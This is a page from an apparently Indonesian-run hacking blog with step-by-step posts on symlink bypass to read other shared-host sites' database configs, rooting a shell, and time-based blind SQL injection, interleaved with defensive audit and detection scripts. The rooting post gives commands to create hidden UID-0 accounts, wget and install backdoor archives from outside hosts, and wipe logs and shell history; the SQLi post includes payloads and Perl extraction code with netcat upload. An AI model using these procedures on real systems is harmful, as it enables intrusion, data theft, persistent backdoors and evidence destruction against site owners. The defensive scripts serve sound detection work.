Saturday, 31 March 2012

How Hackers Hack Into Websites by Symlink Bypass

In our previous article, How Hackers Are Hacking Into Websites by Symlink, we explained step by step how hackers hack a website on a shared host with symlink bypass. But what if the admin has changed the name of the configuration file or moved it somewhere else? In such cases directory access is required in order to locate the configuration file, and that is the topic of today's post: getting directory access via symlink bypass.

What Is Symlink Bypass?

Well, I would not like to go into much detail. For your understanding, all you need to know is that a symlink is a method of referencing other files and folders on Linux, just like a shortcut in Windows. Symlinks are necessary in order to make Linux work faster. Symlink bypassing, however, is a method used to access folders on a server which the user isn't permitted to access. For example, the home directory can only be accessed by a root-level user, but with symlink bypass you can touch files inside the home directory.

Directory Access With Symlink Bypass

Step 1 

Perform the same steps we did before. Create a directory, e.g. abc. Now upload jaguar.izri and .htaccess into it, and give jaguar.izri 0755 permissions.

Step 2

Suppose we uploaded it in the root of the web directory, so our path is www.site.com/abc. Next open it and load jaguar.izri, which will be located at www.site.com/abc/jaguar.izri



Step 3 

Open it and make a new dir named 123 by issuing the command mkdir 123.


Step 4 

Now let's enter dir 123 by giving the command cd 123.


Step 5

Now give the following command: ln -s / root



Step 6

Once you have issued the command ln -s / root, you should see a folder named root in dir 123. To check, go to www.site.com/abc/123/ and you will see a folder named root.



Step 7

Next go back to the script and press upload file:

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php


Copy the above into Notepad, save it as .htaccess and upload it to the 123 folder.





Step 8

Next open the root dir: www.site.com/abc/123/root

Note: if you don't upload that .htaccess you won't see the home folder.


Step 9

Now click on that home folder and upload the domain.php file to get the usernames, or use the command cat /etc/passwd to get the usernames.




Step 10

Now go to bing.com and search ip:xx.xx.xx.xx/joomla to get the Joomla sites on the server. Look for names in the users column of those sites; once found, place that name after home and add public_html, like www.site.com/abc/123/root/home/victimusername/public_html


Step 11

When you do that you will get access to dir of that website.

Step 12

Now click on configuration.php. It will show you a blank page; don't worry, just right-click there and view the page source and you'll have the database access.


Even if the admin has changed the admin login page or the configuration file, you can still find it by using this method.
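For an administrator of a shared host, the procedure above boils down to two observable artefacts: a symlink inside a customer's tree whose target resolves outside that customer's home, and a per-directory .htaccess that enables FollowSymLinks and remaps .php to a text handler so PHP source is served verbatim. The following Python script is an added example and not code from the original post; it builds a constructed sample tree in a temporary directory (the account name, paths and file contents are made up for the demo) and audits it for both artefacts. On a real host the audit would be run per account home, and Apache's SymLinksIfOwnerMatch option is the directive that prevents cross-account links from being followed.

```python
import os
import re
import tempfile
from pathlib import Path

# Directives in a per-directory .htaccess that are risky on a shared host:
# FollowSymLinks lets Apache serve content through links that escape the
# account's tree, and remapping .php to a text handler serves PHP source.
HTACCESS_RISKY = [
    (re.compile(r"^\s*Options\b.*\bFollowSymLinks\b", re.I | re.M),
     "Options FollowSymLinks enabled; use SymLinksIfOwnerMatch instead"),
    (re.compile(r"^\s*Add(?:Type|Handler)\s+\S+\s+.*\.php\b", re.I | re.M),
     "AddType/AddHandler remaps .php (PHP source would be served as text)"),
]


def audit_htaccess(path: Path) -> list:
    """Return one message per risky directive found in a .htaccess file."""
    text = path.read_text(errors="replace")
    return [msg for rx, msg in HTACCESS_RISKY if rx.search(text)]


def audit_account(home: Path) -> list:
    """Walk one account's home and return (kind, path, detail) findings:
    symlinks whose resolved target is outside the home, and risky .htaccess."""
    home = home.resolve()
    findings = []
    for root, dirs, files in os.walk(home):  # os.walk does not descend into symlinked dirs
        for name in dirs + files:
            p = Path(root) / name
            if p.is_symlink():
                target = Path(os.path.realpath(p))
                if target != home and home not in target.parents:
                    findings.append(("symlink_escape", str(p), str(target)))
            elif name == ".htaccess":
                for msg in audit_htaccess(p):
                    findings.append(("htaccess", str(p), msg))
    return findings


def build_sample_tree(base: Path) -> Path:
    """Constructed sample layout mirroring the post: abc/123 holds the
    permissive .htaccess and a link named 'root' pointing at '/'.
    A second, benign link that stays inside the account must not be flagged."""
    home = base / "home" / "victim"
    deep = home / "public_html" / "abc" / "123"
    deep.mkdir(parents=True)
    (deep / ".htaccess").write_text(
        "Options Indexes FollowSymLinks\n"
        "DirectoryIndex ssssss.htm\n"
        "AddType txt .php\n"
        "AddHandler txt .php\n"
    )
    os.symlink("/", deep / "root")
    (home / "public_html" / "index.php").write_text("<?php echo 'ok';\n")
    os.symlink(home / "public_html" / "index.php", home / "public_html" / "home.php")
    return home


def run_demo() -> list:
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_account(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for kind, path, detail in run_demo():
        print(f"{kind:15} {path}\n{'':15} -> {detail}")
```

The benign link (home.php inside the same account) is deliberately included so the check is seen to key on where the target resolves, not on the mere presence of a symlink.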

For fellow bloggers who want to exchange links, visit this link

Tuesday, 27 March 2012

How to Root a Shell

Rooting a shell is easy; here is how:

    1. First go into c99. Prepare nc on our own computer beforehand, then back-connect; if it succeeds, a shell will appear in our Windows cmd or Linux terminal. [If we already have shell access without going through the web, go straight to step 2.]
    2. After that we just plant the local root exploit.
    3. Then we just run the command

    gcc rooter file-localroot

for example, if our local root exploit is named kernel.2.6.35

    gcc rooter kernel.2.6.35

after that command we just enter

    ./rooter

Once there is a response, type whoami or id in our cmd window;
it will output

uid=0(root) gid=0(root) groups=50(ftp)


Next we:

Add a root login for yourself
----------------------------------------------------------------

1. Method I

(not for Red Hat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<-------- to become super user

2. Method II

If you want root access, type:

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
then type
passwd crit

wuasu666

Then add a user for your shell login

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 (entered twice)

---> Install a backdoor on your new shell to guard against unwanted surprises

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup <desired password> <desired port>

example: --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Don't forget to delete your backdoor archives to cover your tracks

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

---> Erase the traces of your rooting by typing the following commands:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
Ctrl-D


Happy Rooting
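Every step of the procedure above leaves something an administrator can look for: a second account with UID 0, interactive shell users whose home directory is / or under /etc, a root .bash_history that has become a symlink to /dev/null, and login or system logs that exist but are empty. The following Python script is an added example and not part of the original post; it runs those checks against a constructed /etc/passwd sample and a constructed filesystem fragment in a temporary directory (account names, paths and log contents are made up for the demo). On a real host the same functions would be pointed at /etc/passwd, /root and /var/log.

```python
import os
import tempfile
from pathlib import Path

# Constructed sample of /etc/passwd (not from any real host). The 'rampok'
# and 'crit' lines mirror the UID-0 accounts the post creates; 'html' is the
# extra shell user placed in the wheel group (GID 10 on many distributions).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
rampok:x:0:0::/:/bin/bash
crit:x:0:0::/etc/crit:/bin/bash
html:x:1001:10::/etc/html:/bin/bash
"""


def extra_uid0_accounts(passwd_text: str) -> list:
    """Every account besides 'root' whose UID is 0: a second root identity."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue
        if fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def shell_users_with_odd_homes(passwd_text: str, normal=("/home/", "/root")) -> list:
    """Interactive-shell accounts whose home lies outside the usual locations
    (the post uses / and /etc/<name>). Returns (name, home) pairs."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, home, shell = fields[0], fields[5], fields[6]
        if shell.endswith("nologin") or shell.endswith("/false"):
            continue
        if not any(home == n.rstrip("/") or home.startswith(n) for n in normal):
            hits.append((name, home))
    return hits


def history_and_log_tampering(root_home: Path, log_dir: Path) -> list:
    """Signs of the post's cleanup step: shell history redirected to
    /dev/null, and login/system logs that exist but are zero bytes."""
    findings = []
    hist = root_home / ".bash_history"
    if hist.is_symlink():
        findings.append(f"{hist} -> {os.readlink(hist)}")
    for name in ("lastlog", "messages", "wtmp", "secure"):
        p = log_dir / name
        if p.exists() and not p.is_symlink() and p.stat().st_size == 0:
            findings.append(f"{p} is empty")
    return findings


def build_sample_fs(base: Path):
    """Constructed filesystem fragment reproducing the post's cleanup."""
    root_home = base / "root"
    log_dir = base / "var" / "log"
    root_home.mkdir()
    log_dir.mkdir(parents=True)
    os.symlink("/dev/null", root_home / ".bash_history")
    (log_dir / "lastlog").touch()  # zero bytes, as left by 'cat > lastlog' + Ctrl-D
    (log_dir / "messages").write_text("Mar 27 10:00:01 host sshd[1]: ok\n")  # constructed line
    return root_home, log_dir


def run_demo() -> dict:
    """Run all three checks on the constructed samples."""
    with tempfile.TemporaryDirectory() as tmp:
        root_home, log_dir = build_sample_fs(Path(tmp))
        tamper = history_and_log_tampering(root_home, log_dir)
    return {
        "extra_uid0": extra_uid0_accounts(SAMPLE_PASSWD),
        "odd_homes": shell_users_with_odd_homes(SAMPLE_PASSWD),
        "tampering": tamper,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The UID check matters more than the user name: useradd -u 0 creates an account that is root to the kernel whatever it is called, and a name-based allow list on /etc/passwd would miss it.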


Time Based Blind SQL Injection


I am not going to talk about Blind SQL injection since this is fully documented across different web sites, check References section at the end of this blog.

The reason I am writing this blog is for two main purposes:

1. Bug Hunting: To explain the process I followed to discover a "not-easy-to-find" vulnerability.

2. Exploit from scratch: To release a tool to extract data from the database via blind SQL injection.


Bug Hunting:

When I put the famous single quote in front of the form I got the well known message:

Microsoft OLE DB Provider for SQL Server
error '80040e14'
Unclosed quotation mark before the character string '''.
Then, without any further parsing of the above error response, I started inserting the common exploitation payloads:
  • '+OR+'1'='1
  • '+OR+1=1--
  • '+having+1=1--
  • '+union (select 1 from table)--
  • etc

The first thing I noticed is that the spaces were being filtered but as explained in my previous SQLi post, you can easily bypass that by injecting a TAB (%09) instead of a space.

After bypassing the space restriction, I always got syntax errors like:


Incorrect syntax near the keyword 'OR'.

Incorrect syntax near the keyword 'having'.

Incorrect syntax near the keyword 'union'.

Which was telling me two things: first, my SQLi was being executed but with syntax errors, and second, that I was not in the common scenario where the injection is placed after the WHERE clause:

select ..... where user='aa' OR 1=1

After a lot of testing without success, I assumed I could not inject any SQL command after the single quote, so I started inserting other chars like ',' and got the error below:

Procedure or function get_Etiqueta has too many arguments specified.

Then I realized we were dealing with a stored procedure which was in fact injectable; this could explain the restrictions and therefore the syntax error messages. So I decided on a new way of injecting (below is the value inserted in the vulnerable POST parameter):

';;--
The above injection says: complete the current request, execute my own SQL command, and comment out the rest of the string.

When executed using a fake table and field:

'; select xxx from table tabla'--

I did not get any error, just a redirect back to the main login page. Then I realized we were not getting any responses from the DB and were therefore in a blind SQL injection scenario, so I decided to use the famous WAITFOR DELAY command from MSSQL to validate whether my attempts were being executed on the server side, so I sent:

0';WAITFOR%09DELAY%09'0:0:15'
And voila!!! The browser waits 15 seconds to get the response from the Server!! Now we have identified the BUG, so, how can we exploit it? Let's go to the next section.

Exploit from Scratch.

I decided to use sqlmap or sqlninja to dump the database or to get a remote shell, but neither worked for me, for one reason: those tools have their own methods to bypass filters, but unfortunately the TAB (%09) trick is not handled by them and therefore all my injections were being rejected. It was a mess to adjust those tools, so I decided to keep improving my own tools and came up with the Regalado-blindSQL.pl perl script.

The main features of the tool are as follows:

  • Creates a SQL procedure to assign the SQL query result to a variable.
  • Iterates over each char of the result and compares it with the ASCII table to identify its value; if the value matches, the response is delayed by 10 seconds, which is how the tool knows a char was identified.
  • Writes output to a log file.
  • Implements the netcat upload feature from the sqlninja tool, changing only the bypass technique and the libraries used to establish the SSL connection.
Below is the script fragment that identifies the chars in the response:

1. my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
2. " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
3. " else waitfor delay '0:0:1'";

At Line 1, we create the variable @s and assign it the result of the $sql being executed.
At line 2, the char at position $j is extracted from the acquired string and compared with a value from the ASCII table ($i).
This loops will repeat until the char is found and then $j will be incremented to move to the next char in the string.

The main loop to get the string, parse each char and compare it with ASCII TABLE is here:

while (length ($dato) > 0){ # Keep searching until no more data is found
    $dato = "";
    for $j (1 .. 100){ # Maximum text length to retrieve, although the tool knows when the string is complete
        print "\t\nIdentificando char number: $j\n";
        open (FILE, ">>", "output.txt") or die $!; # Creating log file
        $r = "";
        for $i (32 .. 126){ # ASCII TABLE, printable chars only
            print "\t\nValidating if the letter exist: " . chr($i) . "\n";
            my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
                      " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
                      " else waitfor delay '0:0:1'";

            send_request($prefix . $cmd . $postfix); # Send HTTPS request
            $r = check_time(); # Measures the response delay to know whether the char was detected
            if ($r eq "encontrado") {
                $dato .= chr($i); # Append the identified char to the string being recovered
                last;
            }
        }

        if ($r eq "encontrado"){
            print "\t\nGetting Contenido ... " . $dato . "\n";
            print FILE "Getting Contenido ...: " . $dato . "\n";
            close(FILE);
        }
        else{ # No char was found; this may mean the end of the identified string
            close(FILE);
            print "\t\n*********END OF CONTENT EXTRACTION ... Moving to next one.\n";
            last;
        }
    }
    print "\t\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi******************\n";
    print FILE "\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi****************\n";

    $sql = $sql . " and $fi not like '". $dato . "'"; # Preparing the next string to retrieve
}
print "\t\nEND OF EXECUTION check output.txt log file.\n\n";

Finally, the tool is able to identify:

  • DB Name
  • DB User
  • DB Version
  • List of tables from current DB
  • List of fields from specific table
  • Content of tables
  • Upload netcat via sqlninja methods.
IMPORTANT: The tool DOES NOT FIND vulnerabilities; it assumes you have already found one and need to leverage the exploitation. This being said, you might need to change the $prefix and $postfix variables within the tool to adjust to the way your application is exploitable.
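From the defender's side, two details of this write-up are worth turning into detection logic. First, a filter that strips only literal spaces is sidestepped with %09, so any keyword matching on request parameters has to happen after URL decoding and whitespace normalization. Second, a WAITFOR DELAY probe that coincides with a 15-second response time is evidence the statement actually executed, and the per-character loop above sends up to 95 such probes per extracted character, so one client accumulating many of them is the strongest signal. The following Python script is an added example and not part of the post or of the Regalado-blindSQL.pl tool; the log format and every log line in it are constructed for the demo (the second line carries the post's own WAITFOR probe, the third its tab-separated tautology).

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed request-log lines (not real traffic): client, method, path with
# query, HTTP status, server-side time in milliseconds. Line 4 is the same
# WAITFOR probe from another client that did not delay (seen, not executed).
SAMPLE_LOG = [
    "10.0.0.5 POST /login.asp?user=admin 302 120",
    "10.0.0.9 POST /login.asp?user=0%27%3BWAITFOR%09DELAY%09%270%3A0%3A15%27 302 15210",
    "10.0.0.9 POST /login.asp?user=%27%09OR%09%271%27%3D%271 500 95",
    "10.0.0.7 POST /login.asp?user=0%27%3BWAITFOR%20DELAY%20%270%3A0%3A15%27 302 130",
    "10.0.0.7 GET /page.asp?id=3 200 40",
]

COMMENT_OR_SPACE = re.compile(r"/\*.*?\*/|\s+", re.S)
TIME_BASED = re.compile(r"\b(?:waitfor\s+delay|sleep\s*\(|benchmark\s*\(|pg_sleep\s*\()")
TAUTOLOGY = re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+|;\s*--|\bunion\s+select\b")
EVASION = re.compile(r"[\t\n\r\x0b\x0c]|/\*")


def normalize(fragment: str) -> str:
    """URL-decode, then collapse tabs, newlines and inline comments to one
    space and lower-case, so keyword matching sees 'waitfor delay' whether
    the client sent %20, %09 or /**/ between the words."""
    decoded = unquote_plus(fragment)
    return COMMENT_OR_SPACE.sub(" ", decoded).strip().lower()


def parse_line(line: str) -> dict:
    """Split one constructed log line into its fields."""
    client, method, path, status, ms = line.split()
    return {"client": client, "method": method, "path": path,
            "status": int(status), "ms": int(ms)}


def classify(entry: dict, slow_ms: int = 5000) -> list:
    """Tags for one request. 'delay_observed' means a time-based payload
    coincided with a slow response, i.e. evidence the statement ran."""
    query = entry["path"].partition("?")[2]
    norm = normalize(query)
    tags = []
    if TIME_BASED.search(norm):
        tags.append("time_based_payload")
        if entry["ms"] >= slow_ms:
            tags.append("delay_observed")
    if TAUTOLOGY.search(norm):
        tags.append("sqli_pattern")
    if EVASION.search(unquote_plus(query)):
        tags.append("whitespace_evasion")
    return tags


def suspicious_clients(lines: list) -> Counter:
    """Count tagged requests per client; character-by-character extraction
    produces dozens of probes per character from a single source."""
    counts = Counter()
    for line in lines:
        entry = parse_line(line)
        if classify(entry):
            counts[entry["client"]] += 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        e = parse_line(line)
        print(e["client"], e["ms"], classify(e))
    print(suspicious_clients(SAMPLE_LOG))
```

Detection is the second line of defence here; the root cause is that the POST value is concatenated into the string that calls the stored procedure, and the fix is to pass it as a bound parameter of a prepared command so that neither a tab nor a quote can change the statement.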

References:
http://danuxx.blogspot.com/2012/03/time-based-blind-sql-injection.html


Thursday, 22 March 2012

Just For Update

Just idly wanting to post an update,
rather than leave the blog un-updated.
That would be a shame.
This blog has been around for how many years now,
but it still hasn't got a page rank,

because I very rarely update.
